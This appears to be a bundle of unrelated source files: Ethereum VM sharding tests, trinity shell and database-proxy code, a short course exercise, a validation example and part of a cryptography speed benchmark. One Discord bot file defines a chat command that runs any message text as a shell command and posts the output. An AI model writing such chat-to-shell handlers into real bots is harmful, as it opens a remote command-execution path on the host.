def test_call_transfers_value(vm):
vm_state = vm.state
with vm_state.state_db() as state_db:
balance_sender_before = state_db.get_balance(ACCOUNT_ADDRESS)
balance_destination_before = state_db.get_balance(DESTINATION_ADDRESS)
# Update state_root manually
vm.block.header.state_root = vm_state.state_root
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"value": 10
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
vm_state = vm.state
with vm_state.state_db() as state_db:
balance_sender_after = state_db.get_balance(ACCOUNT_ADDRESS)
balance_destination_after = state_db.get_balance(DESTINATION_ADDRESS)
# Update state_root manually
vm.block.header.state_root = vm_state.state_root
assert balance_sender_after == balance_sender_before - 10
assert balance_destination_after == balance_destination_before + 10
@pytest.mark.parametrize("v,r,s", [
(0, 0, 0),
(DEFAULT_V + 1, DEFAULT_R, DEFAULT_S),
(DEFAULT_V + 2, DEFAULT_R, DEFAULT_S),
(DEFAULT_V - 1, DEFAULT_R, DEFAULT_S),
(0, DEFAULT_R, DEFAULT_S),
(1, DEFAULT_R, DEFAULT_S),
(DEFAULT_V, DEFAULT_R + 1, DEFAULT_S),
(DEFAULT_V, DEFAULT_R - 1, DEFAULT_S),
(DEFAULT_V, 0, DEFAULT_S),
(DEFAULT_V, DEFAULT_R, DEFAULT_S + 1),
(DEFAULT_V, DEFAULT_R, DEFAULT_S - 1),
(DEFAULT_V, DEFAULT_R, 0),
(27 if DEFAULT_V == 28 else 28, DEFAULT_R, SECPK1_N - DEFAULT_S),
])
def test_call_checks_signature(vm, v, r, s):
transaction = UserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {"v": v, "r": r, "s": s}))
message_params = {
"gas": transaction.gas,
"to": transaction.to,
"sender": ENTRY_POINT,
"value": 0,
"code": ACCOUNT_CODE,
"is_create": False,
"access_list": transaction.prefix_list,
}
message = ShardingMessage(**assoc(message_params, "data", transaction.data))
transaction_context = ShardingTransactionContext(
origin=ENTRY_POINT,
sig_hash=transaction.sig_hash,
transaction_gas_limit=transaction.gas,
)
computation = vm.state.get_computation(message, transaction_context)
computation = computation.apply_message()
assert computation.is_error
    # the error is due to the bad signature, so the tx should pass with the original data
message = ShardingMessage(**assoc(message_params, "data", SIGNED_DEFAULT_TRANSACTION.data))
computation = vm.state.get_computation(message, transaction_context)
computation = computation.apply_message()
assert computation.is_success
def test_call_uses_remaining_gas(vm):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": GAS_LOGGING_CONTRACT_ADDRESS,
"gas": 1 * 1000 * 1000,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[GAS_LOGGING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
logs = computation.get_log_entries()
assert len(logs) == 1
logged_gas = big_endian_to_int(logs[0][-1])
assert logged_gas > 900 * 1000 # some gas will have been consumed earlier
@pytest.mark.parametrize("data,hash", [
(data, keccak(data)) for data in [
b"",
b"\x112233"
b"\x00" * 32,
b"\xff" * 32,
b"\xaa" * 50,
b"\x55" * 64,
b"\x22" * 500,
]
])
def test_call_uses_data(vm, data, hash):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": DATA_LOGGING_CONTRACT_ADDRESS,
"msg_data": data,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[DATA_LOGGING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
logs = computation.get_log_entries()
assert len(logs) == 1
logged_hash = logs[0][-1]
assert logged_hash == hash
def test_no_call_if_not_enough_gas(vm):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": NOOP_CONTRACT_ADDRESS,
"gas": 80000,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[NOOP_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_error
# a little remains, but not enough to make the call
assert computation.gas_meter.gas_remaining > 0
def test_call_passes_return_code(vm):
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": NOOP_CONTRACT_ADDRESS,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[NOOP_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert big_endian_to_int(computation.output) == 1 # success
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"destination": FAILING_CONTRACT_ADDRESS,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[FAILING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert big_endian_to_int(computation.output) == 0 # failure
def test_call_does_not_revert_nonce(vm):
nonce_before = get_nonce(vm)
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": nonce_before,
"destination": FAILING_CONTRACT_ADDRESS,
"access_list": DEFAULT_TX_PARAMS["access_list"] + [[FAILING_CONTRACT_ADDRESS]],
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert get_nonce(vm) == nonce_before + 1
def test_nonce_getter_id():
assert NONCE_GETTER_ID == big_endian_to_int(keccak(b"get_nonce()")[:4])
```
#### File: auxiliary/user-account/test_helpers.py
```python
import pytest
from eth_keys import keys
from cytoolz import (
merge,
)
from evm.exceptions import ValidationError
from evm.auxiliary.user_account_contract.transaction import (
UserAccountTransaction,
UnsignedUserAccountTransaction
)
VALID_PARAMS = {
"chain_id": 1,
"shard_id": 2,
"to": b"\xaa" * 20,
"gas": 300000,
"access_list": [[b"\xaa" * 20, b"\x00"]],
"destination": b"\xbb" * 20,
"value": 4,
"nonce": 5,
"min_block": 6,
"max_block": 7,
"gas_price": 8,
"msg_data": b"\xcc" * 123,
}
INVALID_PARAMS = {
"chain_id": b"\x01",
"shard_id": b"\x02",
"to": "0x" + "aa" * 20,
"gas": b"\x03",
"access_list": [[b"\xaa" * 20, 0]],
"destination": "0x" + "bb" * 20,
"value": b"\x04",
"nonce": b"\x05",
"min_block": b"\x06",
"max_block": b"\x07",
"gas_price": b"\x08",
"msg_data": 123,
}
@pytest.fixture
def unsigned_transaction():
return UnsignedUserAccountTransaction(**VALID_PARAMS)
def test_signing(unsigned_transaction):
private_key = keys.PrivateKey(b"\x22" * 32)
signed_transaction = unsigned_transaction.as_signed_transaction(private_key)
assert signed_transaction.get_sender() == private_key.public_key.to_canonical_address()
def test_data(unsigned_transaction):
private_key = keys.PrivateKey(b"\x22" * 32)
signed_transaction = unsigned_transaction.as_signed_transaction(private_key)
assert len(signed_transaction.data) > 10 * 32
assert signed_transaction.data.endswith(signed_transaction.msg_data)
assert signed_transaction.data.endswith(unsigned_transaction.msg_data)
assert len(signed_transaction.data) == len(unsigned_transaction.data) + 96
@pytest.mark.parametrize("key,value", INVALID_PARAMS.items())
def test_validation(key, value):
# construct object with valid parameters, apply invalid values afterwards
# this ensures object creation succeeds
tx = UnsignedUserAccountTransaction(**VALID_PARAMS)
with pytest.raises(ValidationError):
setattr(tx, key, value)
tx.validate()
tx = UserAccountTransaction(**merge(VALID_PARAMS, {"v": 27, "r": 1, "s": 1}))
with pytest.raises(ValidationError):
setattr(tx, key, value)
tx.validate()
```
#### File: core/vm/test_shard_vm.py
```python
import os
import json
from eth_utils import (
int_to_big_endian,
decode_hex,
)
from evm.exceptions import (
IncorrectContractCreationAddress,
ContractCreationCollision,
)
from evm.utils.address import generate_CREATE2_contract_address
from evm.utils.padding import pad32
from tests.core.helpers import (
new_sharding_transaction,
)
DIR = os.path.dirname(__file__)
def test_sharding_apply_transaction(unvalidated_shard_chain): # noqa: F811
chain = unvalidated_shard_chain
CREATE2_contracts = json.load(
open(os.path.join(DIR, '../contract_fixtures/CREATE2_contracts.json'))
)
simple_transfer_contract = CREATE2_contracts["simple_transfer_contract"]
CREATE2_contract = CREATE2_contracts["CREATE2_contract"]
simple_factory_contract_bytecode = CREATE2_contracts["simple_factory_contract"]["bytecode"]
# First test: simple ether transfer contract
first_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(simple_transfer_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=simple_transfer_contract['bytecode'],
)
vm = chain.get_vm()
computation, _ = vm.apply_transaction(first_deploy_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used
assert gas_used > first_deploy_tx.intrinsic_gas
last_gas_used = gas_used
# Transfer ether to recipient
recipient = decode_hex('0xa94f5374fce5edbc8e2a8697c15331677e6ebf0c')
amount = 100
tx_initiator = decode_hex(simple_transfer_contract['address'])
transfer_tx = new_sharding_transaction(tx_initiator, recipient, amount, b'', b'')
computation, _ = vm.apply_transaction(transfer_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > transfer_tx.intrinsic_gas
last_gas_used = vm.block.header.gas_used
with vm.state.state_db(read_only=True) as state_db:
assert state_db.get_balance(recipient) == amount
    # Second test: contract that deploys a new contract with CREATE2
second_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(CREATE2_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=CREATE2_contract['bytecode'],
)
computation, _ = vm.apply_transaction(second_deploy_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > second_deploy_tx.intrinsic_gas
last_gas_used = vm.block.header.gas_used
# Invoke the contract to deploy new contract
tx_initiator = decode_hex(CREATE2_contract['address'])
newly_deployed_contract_address = generate_CREATE2_contract_address(
int_to_big_endian(0),
decode_hex(simple_factory_contract_bytecode)
)
invoke_tx = new_sharding_transaction(
tx_initiator,
b'',
0,
b'',
b'',
access_list=[[tx_initiator, pad32(b'')], [newly_deployed_contract_address]]
)
computation, _ = vm.apply_transaction(invoke_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > invoke_tx.intrinsic_gas
with vm.state.state_db(read_only=True) as state_db:
newly_deployed_contract_address = generate_CREATE2_contract_address(
int_to_big_endian(0),
decode_hex(simple_factory_contract_bytecode)
)
assert state_db.get_code(newly_deployed_contract_address) == b'\xbe\xef'
assert state_db.get_storage(decode_hex(CREATE2_contract['address']), 0) == 1
def test_CREATE2_deploy_contract_edge_cases(unvalidated_shard_chain): # noqa: F811
CREATE2_contracts = json.load(
open(os.path.join(DIR, '../contract_fixtures/CREATE2_contracts.json'))
)
simple_transfer_contract = CREATE2_contracts["simple_transfer_contract"]
# First case: computed contract address not the same as provided in `transaction.to`
chain = unvalidated_shard_chain
code = "0xf3"
computed_address = generate_CREATE2_contract_address(b"", decode_hex(code))
first_failed_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(simple_transfer_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=code,
access_list=[[decode_hex(simple_transfer_contract['address'])], [computed_address]]
)
vm = chain.get_vm()
computation, _ = vm.apply_transaction(first_failed_deploy_tx)
assert isinstance(computation._error, IncorrectContractCreationAddress)
gas_used = vm.block.header.gas_used
assert gas_used > first_failed_deploy_tx.intrinsic_gas
last_gas_used = gas_used
# Next, complete deploying the contract
successful_deploy_tx = new_sharding_transaction(
tx_initiator=decode_hex(simple_transfer_contract['address']),
data_destination=b'',
data_value=0,
data_msgdata=b'',
data_vrs=b'',
code=simple_transfer_contract['bytecode'],
)
computation, _ = vm.apply_transaction(successful_deploy_tx)
assert not computation.is_error
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > successful_deploy_tx.intrinsic_gas
last_gas_used = gas_used
# Second case: deploy to existing account
second_failed_deploy_tx = successful_deploy_tx
computation, _ = vm.apply_transaction(second_failed_deploy_tx)
assert isinstance(computation._error, ContractCreationCollision)
gas_used = vm.block.header.gas_used - last_gas_used
assert gas_used > second_failed_deploy_tx.intrinsic_gas
```
#### File: py-evm/trinity/cli.py
```python
import asyncio
import atexit
import logging
import traceback
import threading
from typing import Dict # noqa: F401
from p2p.lightchain import LightChain
LOGFILE = '/tmp/trinity-shell.log'
LOGLEVEL = logging.INFO
loop = asyncio.get_event_loop()
def wait_for_result(coroutine):
future = asyncio.run_coroutine_threadsafe(coroutine, loop)
return future.result()
def setup_namespace(chain):
"""Setup the variables to be used in shell instance."""
namespace = dict(
chain=chain,
wait_for_result=wait_for_result
)
return namespace
def ipython_shell(namespace=None, banner=None, debug=False):
"""Try to run IPython shell."""
try:
import IPython
except ImportError:
if debug:
traceback.print_exc()
print("IPython not available. Running default shell...")
return
    # First try the newer (IPython >= 1.0) top-level `IPython` import
if hasattr(IPython, 'terminal'):
from IPython.terminal.embed import InteractiveShellEmbed
kwargs = dict(user_ns=namespace)
else:
from IPython.frontend.terminal.embed import InteractiveShellEmbed # type: ignore
kwargs = dict(user_ns=namespace)
if banner:
kwargs = dict(banner1=banner)
return InteractiveShellEmbed(**kwargs)
def python_shell(namespace=None, banner=None, debug=False):
"""Start a vanilla Python REPL shell."""
import code
from functools import partial
try:
import readline, rlcompleter # NOQA
except ImportError:
if debug:
traceback.print_exc()
else:
readline.parse_and_bind('tab: complete')
# Add global, local and custom namespaces to current shell
default_ns = globals().copy()
default_ns.update(locals())
if namespace:
default_ns.update(namespace)
# Configure kwargs to pass banner
kwargs = dict() # type: Dict[str, str]
if banner:
kwargs = dict(banner=banner)
shell = code.InteractiveConsole(default_ns)
return partial(shell.interact, **kwargs)
def console(
chain: LightChain,
use_ipython: bool = True,
namespace: dict = None,
banner: str = None,
debug: bool = False) -> None:
"""
    Start the chain, set up the trinity CLI and register the
    cleanup function.
"""
# update the namespace with the required variables
namespace = {} if namespace is None else namespace
namespace.update(setup_namespace(chain))
if use_ipython:
shell = ipython_shell(namespace, banner, debug)
print("Logging to", LOGFILE)
log_level = logging.DEBUG if debug else LOGLEVEL
logging.basicConfig(level=log_level, filename=LOGFILE)
# Start the thread
t = threading.Thread(target=loop.run_until_complete, args=(run_lightchain(chain),),
daemon=True)
t.start()
    # If we can't import or start the IPython shell, use the default shell
if not use_ipython or shell is None:
shell = python_shell(namespace, banner, debug)
shell()
def cleanup():
chain.cancel_token.trigger()
# Wait until run() finishes.
t.join()
atexit.register(cleanup)
async def run_lightchain(lightchain: LightChain) -> None:
try:
asyncio.ensure_future(lightchain.peer_pool.run())
await lightchain.run()
finally:
await lightchain.peer_pool.stop()
await lightchain.stop()
```
#### File: trinity/db/base.py
```python
from multiprocessing.managers import ( # type: ignore
BaseProxy,
)
class DBProxy(BaseProxy):
_exposed_ = (
'get',
'set',
'delete',
'exists',
)
def __getitem__(self, key):
return self._callmethod('get', (key,))
def __setitem__(self, key, value):
return self._callmethod('set', (key, value))
def __delitem__(self, key):
return self._callmethod('delete', (key,))
def __contains__(self, key):
return self._callmethod('exists', (key,))
```
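
A minimal sketch of how a proxy like the one above can be wired up with a `BaseManager` (the `DictDB` class and the `get_db` typeid are hypothetical stand-ins for trinity's real database object):
```python
from multiprocessing.managers import BaseManager


class DictDB:
    """Toy in-memory store exposing the methods DBProxy expects."""
    def __init__(self):
        self._data = {}

    def get(self, key):
        return self._data[key]

    def set(self, key, value):
        self._data[key] = value

    def delete(self, key):
        del self._data[key]

    def exists(self, key):
        return key in self._data


class DBManager(BaseManager):
    pass


DBManager.register('get_db', callable=DictDB, proxytype=DBProxy)

if __name__ == '__main__':
    manager = DBManager()
    manager.start()
    db = manager.get_db()          # a DBProxy talking to the manager process
    db[b'key'] = b'value'
    assert b'key' in db and db[b'key'] == b'value'
    del db[b'key']
    manager.shutdown()
```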
|
{
"source": "jesterwanderer/curso-python-cursoemvideo",
"score": 3
}
|
#### File: CursoPython/Aulas/aula20a.py
```python
def soma(a, b):
s = a + b
print(f'A soma de {a} + {b} é = {s}')
soma(15, 13)
```
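
A small illustrative variant (not part of the course file) that returns the sum instead of printing it, so the result can be reused by the caller:
```python
def soma_retorno(a, b):
    # Same addition as above, but handing the value back to the caller.
    return a + b


resultado = soma_retorno(15, 13)
print(f'A soma de 15 + 13 é = {resultado}')
```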
|
{
"source": "JesterXL/avoiding-primitive-obession",
"score": 3
}
|
#### File: avoiding-primitive-obession/python/index2.py
```python
from dataclasses import dataclass, astuple
from enum import Enum
from returns.result import Result, Success, Failure
from functools import reduce
class Team(Enum):
Red = "red"
Blue = "blue"
def team_to_str(teamName:Team) -> str:
# match teamName:
# case Team.Red:
# return "red"
# case Team.Blue:
# return "blue"
# case _:
# return "uh"
if teamName == Team.Red:
return "red"
elif teamName == Team.Blue:
return "blue"
else:
return "uh"
@dataclass
class Name:
name: str
def __iter__(self):
return iter(astuple(self))
@dataclass
class Phone:
phone: str
def __iter__(self):
return iter(astuple(self))
@dataclass
class Age:
age: int
def __iter__(self):
return iter(astuple(self))
@dataclass
class Person:
team: Team
name: Name
age: Age
phone: Phone
def __str__(self):
return f'Person(team={team_to_str(self.team)}, name={self.name}, age={self.age}, phone={self.phone})'
def get_person(team:Team, name:Name, age:Age, phone:Phone) -> Result[Person, str]:
return (
validate_name(name)
.bind(lambda _: validate_phone(phone))
.bind(lambda _: validate_age(age))
        .bind(lambda _: Success(Person(team, name, age, phone)))
)
def all_blanks(acc, character):
if acc == False:
return False
elif character == "":
return True
else:
return False
def validate_name(name_:Name) -> Result[str, str]:
[name] = name_
# can't be 0 characters
if len(name) < 1:
return Failure('name cannot be blank')
# can't be a bunch-o-blanks
if reduce(all_blanks, name.split(), True) == True:
return Failure('name cannot be a bunch of blanks')
return Success(name)
def validate_phone(phone_:Phone) -> Result[str, str]:
[phone] = phone_
if len(phone) < 9:
return Failure('phone cannot be less than 9 characters')
if reduce(is_ok_phone_character, list(phone.strip()), True) == False:
return Failure('phone has an unknown character, it must be either a number or ), (, or - as we strip our blank spaces')
return Success(phone)
def is_parseable_int(character:str) -> bool:
try:
parsed = int(character)
return True
except:
return False
def is_ok_phone_character(acc:bool, character:str) -> bool:
if acc == False:
return False
if character == ')' or character == '(' or character == '-':
return True
return is_parseable_int(character)
def validate_age(age_:Age) -> Result[str, str]:
[age] = age_
if is_parseable_int(age) == False:
return Failure('failed to parse age to an integer')
parsed = int(age)
if parsed < 0:
return Failure('age must be greater than -1')
return Success(age)
jesse = get_person(Team.Red, Name("Jesse"), Age(42), Phone("804-555-1234"))
print(jesse)
```
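
A couple of hedged usage checks for the validation chain above, showing how a bad input short-circuits into a `Failure` (the input values are illustrative):
```python
# A blank name fails at the first validation step, so no Person is built.
blank_name = get_person(Team.Blue, Name(""), Age(30), Phone("804-555-9999"))
print(blank_name)   # roughly: <Failure: name cannot be blank>

# A malformed phone number fails at the phone-validation step instead.
bad_phone = get_person(Team.Blue, Name("Brandy"), Age(30), Phone("nope"))
print(bad_phone)    # roughly: <Failure: phone cannot be less than 9 characters>
```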
|
{
"source": "jestes15/GoogleBot",
"score": 2
}
|
#### File: jestes15/GoogleBot/backend_operations.py
```python
import json as js
import os
import discord
from discord.ext import commands
from discord.ext.commands import has_permissions
from dotenv import load_dotenv
data = None
def load_data_file():
global data
with open("data.json") as data_file:
data = js.loads(data_file.read())
def dump_data():
global data
with open("data.json", "w") as file:
js.dump(data, file)
if __name__ == "__main__":
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
bot = commands.Bot(command_prefix=["$"])
@has_permissions(administrator=True)
@bot.command(name="shell-run")
async def shell(ctx, cmd_var: str):
out = os.popen(cmd_var)
await ctx.channel.send(f"The output is: {out.read()}")
@has_permissions(administrator=True)
@bot.command(name="restart")
async def restart(ctx):
dump_data()
var = os.popen("cd .. && ./restart")
await ctx.channel.send(var.read())
@has_permissions(administrator=True)
@bot.command(name="stop")
async def stop(ctx):
dump_data()
var = os.popen("forever stop Google && forever stop watchdog")
await ctx.channel.send(var.read())
@has_permissions(administrator=True)
@bot.command(name="start")
async def start(ctx):
dump_data()
var = os.popen("cd .. && ./start")
await ctx.channel.send(var.read())
@has_permissions(administrator=True)
@bot.command(name="update")
async def update(ctx):
dump_data()
var = os.popen("cd .. && ./update && ./update2")
await ctx.channel.send(var.read())
bot.run(TOKEN)
```
|
{
"source": "jestinepaul/pycryptodome",
"score": 2
}
|
#### File: jestinepaul/pycryptodome/pct-speedtest.py
```python
import time
import os
import sys
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, PKCS1_v1_5 as RSAES_PKCS1_v1_5
from Crypto.Signature import PKCS1_PSS, PKCS1_v1_5 as RSASSA_PKCS1_v1_5
from Crypto.Cipher import (AES, ARC2, ARC4, Blowfish, CAST, DES3, DES,
Salsa20, ChaCha20)
from Crypto.Hash import (HMAC, MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512,
CMAC, SHA3_224, SHA3_256, SHA3_384, SHA3_512,
BLAKE2b, BLAKE2s)
from Crypto.Random import get_random_bytes
import Crypto.Util.Counter
from Crypto.Util.number import bytes_to_long
try:
from Crypto.Hash import SHA1
except ImportError:
# Maybe it's called SHA
from Crypto.Hash import SHA as SHA1
try:
from Crypto.Hash import RIPEMD160
except ImportError:
# Maybe it's called RIPEMD
try:
from Crypto.Hash import RIPEMD as RIPEMD160
except ImportError:
# Some builds of PyCrypto don't have the RIPEMD module
RIPEMD160 = None
try:
import hashlib
import hmac
except ImportError: # Some builds/versions of Python don't have a hashlib module
hashlib = hmac = None
from Crypto.Random import random as pycrypto_random
import random as stdlib_random
class BLAKE2b_512(object):
digest_size = 512
@staticmethod
def new(data=None):
return BLAKE2b.new(digest_bits=512, data=data)
class BLAKE2s_256(object):
digest_size = 256
@staticmethod
def new(data=None):
return BLAKE2s.new(digest_bits=256, data=data)
class ChaCha20_old_style(object):
@staticmethod
def new(key, nonce):
return ChaCha20.new(key=key, nonce=nonce)
class ModeNotAvailable(ValueError):
pass
rng = get_random_bytes
class Benchmark:
def __init__(self):
self.__random_data = None
def random_keys(self, bytes, n=10**5):
"""Return random keys of the specified number of bytes.
If this function has been called before with the same number of bytes,
cached keys are used instead of randomly generating new ones.
"""
return self.random_blocks(bytes, n)
def random_blocks(self, bytes_per_block, blocks):
bytes = bytes_per_block * blocks
data = self.random_data(bytes)
retval = []
for i in range(blocks):
p = i * bytes_per_block
retval.append(data[p:p+bytes_per_block])
return retval
def random_data(self, bytes):
if self.__random_data is None:
self.__random_data = self._random_bytes(bytes)
return self.__random_data
elif bytes == len(self.__random_data):
return self.__random_data
elif bytes < len(self.__random_data):
return self.__random_data[:bytes]
else:
self.__random_data += self._random_bytes(bytes - len(self.__random_data))
return self.__random_data
def _random_bytes(self, b):
return os.urandom(b)
def announce_start(self, test_name):
sys.stdout.write("%s: " % (test_name,))
sys.stdout.flush()
def announce_result(self, value, units):
sys.stdout.write("%.2f %s\n" % (value, units))
sys.stdout.flush()
def test_random_module(self, module_name, module):
self.announce_start("%s.choice" % (module_name,))
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
t0 = time.time()
for i in range(5000):
module.choice(alphabet)
t = time.time()
invocations_per_second = 5000 / (t - t0)
self.announce_result(invocations_per_second, "invocations/sec")
def test_pubkey_setup(self, pubkey_name, module, key_bytes):
self.announce_start("%s pubkey setup" % (pubkey_name,))
keys = self.random_keys(key_bytes)[:5]
t0 = time.time()
for k in keys:
module.generate(key_bytes*8)
t = time.time()
pubkey_setups_per_second = len(keys) / (t - t0)
self.announce_result(pubkey_setups_per_second, "Keys/sec")
def test_key_setup(self, cipher_name, module, key_bytes, params):
self.generate_cipher(module, key_bytes, params)
self.announce_start("%s key setup" % (cipher_name,))
for x in xrange(5000):
t0 = time.time()
self.generate_cipher(module, key_bytes, params)
t = time.time()
key_setups_per_second = 5000 / (t - t0)
self.announce_result(key_setups_per_second/1000, "kKeys/sec")
def test_encryption(self, cipher_name, module, key_bytes, params):
self.announce_start("%s encryption" % (cipher_name,))
pt_size = 16384000L
pt = rng(pt_size)
cipher = self.generate_cipher(module, key_bytes, params)
# Perform encryption
t0 = time.time()
cipher.encrypt(pt)
t = time.time()
encryption_speed = pt_size / (t - t0)
self.announce_result(encryption_speed / 10**6, "MBps")
def test_hash_small(self, hash_name, hash_constructor, digest_size):
self.announce_start("%s (%d-byte inputs)" % (hash_name, digest_size))
blocks = self.random_blocks(digest_size, 10000)
# Initialize hashes
t0 = time.time()
for b in blocks:
hash_constructor(b).digest()
t = time.time()
hashes_per_second = len(blocks) / (t - t0)
self.announce_result(hashes_per_second / 1000, "kHashes/sec")
def test_hash_large(self, hash_name, hash_constructor, digest_size):
self.announce_start("%s (single large input)" % (hash_name,))
blocks = self.random_blocks(16384, 10000)
# Perform hashing
t0 = time.time()
h = hash_constructor()
for b in blocks:
h.update(b)
h.digest()
t = time.time()
hash_speed = len(blocks) * len(blocks[0]) / (t - t0)
self.announce_result(hash_speed / 10**6, "MBps")
def test_hmac_small(self, mac_name, hmac_constructor, digestmod, digest_size):
keys = iter(self.random_keys(digest_size))
if sys.version_info[0] == 2:
mac_constructor = lambda data=None: hmac_constructor(keys.next(), data, digestmod)
else:
mac_constructor = lambda data=None: hmac_constructor(keys.__next__(), data, digestmod)
self.test_hash_small(mac_name, mac_constructor, digest_size)
def test_hmac_large(self, mac_name, hmac_constructor, digestmod, digest_size):
key = self.random_keys(digest_size)[0]
mac_constructor = lambda data=None: hmac_constructor(key, data, digestmod)
self.test_hash_large(mac_name, mac_constructor, digest_size)
def test_cmac_small(self, mac_name, cmac_constructor, ciphermod, key_size):
keys = iter(self.random_keys(key_size))
if sys.version_info[0] == 2:
mac_constructor = lambda data=None: cmac_constructor(keys.next(), data, ciphermod)
else:
mac_constructor = lambda data=None: cmac_constructor(keys.__next__(), data, ciphermod)
self.test_hash_small(mac_name, mac_constructor, ciphermod.block_size)
def test_cmac_large(self, mac_name, cmac_constructor, ciphermod, key_size):
key = self.random_keys(key_size)[0]
mac_constructor = lambda data=None: cmac_constructor(key, data, ciphermod)
self.test_hash_large(mac_name, mac_constructor, ciphermod.block_size)
def test_pkcs1_sign(self, scheme_name, scheme_constructor, hash_name, hash_constructor, digest_size):
self.announce_start("%s signing %s (%d-byte inputs)" % (scheme_name, hash_name, digest_size))
# Make a key
k = RSA.generate(2048)
sigscheme = scheme_constructor(k)
# Make some hashes
blocks = self.random_blocks(digest_size, 50)
hashes = []
for b in blocks:
hashes.append(hash_constructor(b))
# Perform signing
t0 = time.time()
for h in hashes:
sigscheme.sign(h)
t = time.time()
speed = len(hashes) / (t - t0)
self.announce_result(speed, "sigs/sec")
def test_pkcs1_verify(self, scheme_name, scheme_constructor, hash_name, hash_constructor, digest_size):
self.announce_start("%s verification %s (%d-byte inputs)" % (scheme_name, hash_name, digest_size))
# Make a key
k = RSA.generate(2048)
sigscheme = scheme_constructor(k)
# Make some hashes
blocks = self.random_blocks(digest_size, 50)
hashes = []
for b in blocks:
hashes.append(hash_constructor(b))
# Make some signatures
signatures = []
for h in hashes:
signatures.append(sigscheme.sign(h))
# Double the list, to make timing better
hashes = hashes + hashes
signatures = signatures + signatures
# Perform verification
t0 = time.time()
for h, s in zip(hashes, signatures):
sigscheme.verify(h, s)
t = time.time()
speed = len(hashes) / (t - t0)
self.announce_result(speed, "sigs/sec")
def generate_cipher(self, module, key_size, params):
params_dict = {}
if params:
params_dict = dict([x.split("=") for x in params.split(" ")])
gen_tuple = []
gen_dict = {}
# 1st parameter (mandatory): key
if params_dict.get('ks') == "x2":
key = rng(2 * key_size)
else:
key = rng(key_size)
gen_tuple.append(key)
# 2nd parameter: mode
mode = params_dict.get("mode")
if mode:
mode_value = getattr(module, mode, None)
if mode_value is None:
# Mode not available for this cipher
raise ModeNotAvailable()
gen_tuple.append(getattr(module, mode))
# 3rd parameter: IV/nonce
iv_length = params_dict.get("iv")
if iv_length is None:
iv_length = params_dict.get("nonce")
if iv_length:
if iv_length == "bs":
iv_length = module.block_size
iv = rng(int(iv_length))
gen_tuple.append(iv)
# Specific to CTR mode
le = params_dict.get("little_endian")
if le:
if le == "True":
le = True
else:
le = False
# Remove iv from parameters
gen_tuple = gen_tuple[:-1]
ctr = Crypto.Util.Counter.new(module.block_size*8,
initial_value=bytes_to_long(iv),
little_endian=le,
allow_wraparound=True)
gen_dict['counter'] = ctr
# Generate cipher
return module.new(*gen_tuple, **gen_dict)
def run(self):
pubkey_specs = [
("RSA(1024)", RSA, int(1024/8)),
("RSA(2048)", RSA, int(2048/8)),
("RSA(4096)", RSA, int(4096/8)),
]
block_cipher_modes = [
# Mode name, key setup, parameters
("CBC", True, "mode=MODE_CBC iv=bs"),
("CFB-8", False, "mode=MODE_CFB iv=bs"),
("OFB", False, "mode=MODE_OFB iv=bs"),
("ECB", False, "mode=MODE_ECB"),
("CTR-LE", True, "mode=MODE_CTR iv=bs little_endian=True"),
("CTR-BE", False, "mode=MODE_CTR iv=bs little_endian=False"),
("OPENPGP", False, "mode=MODE_OPENPGP iv=bs"),
("CCM", True, "mode=MODE_CCM nonce=12"),
("GCM", True, "mode=MODE_GCM nonce=16"),
("EAX", True, "mode=MODE_EAX nonce=16"),
("SIV", True, "mode=MODE_SIV ks=x2 nonce=16"),
("OCB", True, "mode=MODE_OCB nonce=15"),
]
block_specs = [
# Cipher name, module, key size
("DES", DES, 8),
("DES3", DES3, 24),
("AES128", AES, 16),
("AES192", AES, 24),
